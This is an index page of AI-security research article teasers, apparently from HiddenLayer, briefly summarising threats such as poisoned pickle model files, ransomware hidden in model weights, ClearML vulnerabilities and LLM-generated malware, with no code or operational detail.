Research

Research
min read

Machine Learning Operations: What You Need to Know Now

HiddenLayer researchers discovered six 0-day vulnerabilities in ClearML, enabling complete system compromise via exploit chains.

Research
min read

The Use and Abuse of AI Cloud Services

AI cloud services are being hijacked for cryptomining, password cracking, and hosting malicious phishing bots.

Research
min read

Machine Learning Models are Code

Researchers uncovered critical code execution flaws in TensorFlow and Keras models via Lambda layers and I/O operations.

Research
min read

The Dark Side of Large Language Models Part 2

The Feedback Loop: The rapid proliferation of AI-generated content online creates a "Dead Internet" risk, where future models are trained on low-quality AI data, leading to a permanent degradation of information quality.

Research
min read

The Dark Side of Large Language Models Part 1

Malware on the Fly: Attackers now use LLM APIs to synthesize polymorphic malware. In these scenarios, the malicious code (like a keylogger) is generated uniquely each time it executes, making it nearly invisible to traditional signature-based antivirus.

Research
min read

Machine Learning Threat Roundup

Modern ML models (like those using PyTorch) often contain data.pkl files. These files are meant to reconstruct neural network weights but can be "poisoned" to include malicious system calls.

Research
min read

Supply Chain Threats: Critical Look at Your ML Ops Pipeline

ML supply chain attacks leverage data poisoning and hijacked models to steal data and compromise cloud environments.

Research
min read

Pickle Files: The New ML Model Attack Vector

Adversaries are weaponizing Python's pickle format to hide Cobalt Strike and Mythic C2 agents in machine learning models.

Research
min read

Weaponizing ML Models with Ransomware

Machine learning models can hide ransomware in their weights using steganography and execute it via insecure pickle deserialization.

Research
min read

Machine Learning is the New Launchpad for Ransomware

AI models can be weaponized with hidden ransomware, exploiting insecure serialization to bypass traditional security.

Research
min read

Unpacking the AI Adversarial Toolkit

The Rise of Autonomy: Tools have evolved from static libraries to Autonomous Pentesting Agents (e.g., Penligent, XBOW) that use "Chain-of-Thought" reasoning to execute end-to-end attack chains without human intervention.

Research
min read

Analyzing Threats to Artificial Intelligence: A Book Review

Dan Klinedinst discusses AI security frameworks, shifting threat landscapes, and the vital role of proactive threat modeling.

Understand AI Security, Clearly Defined

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.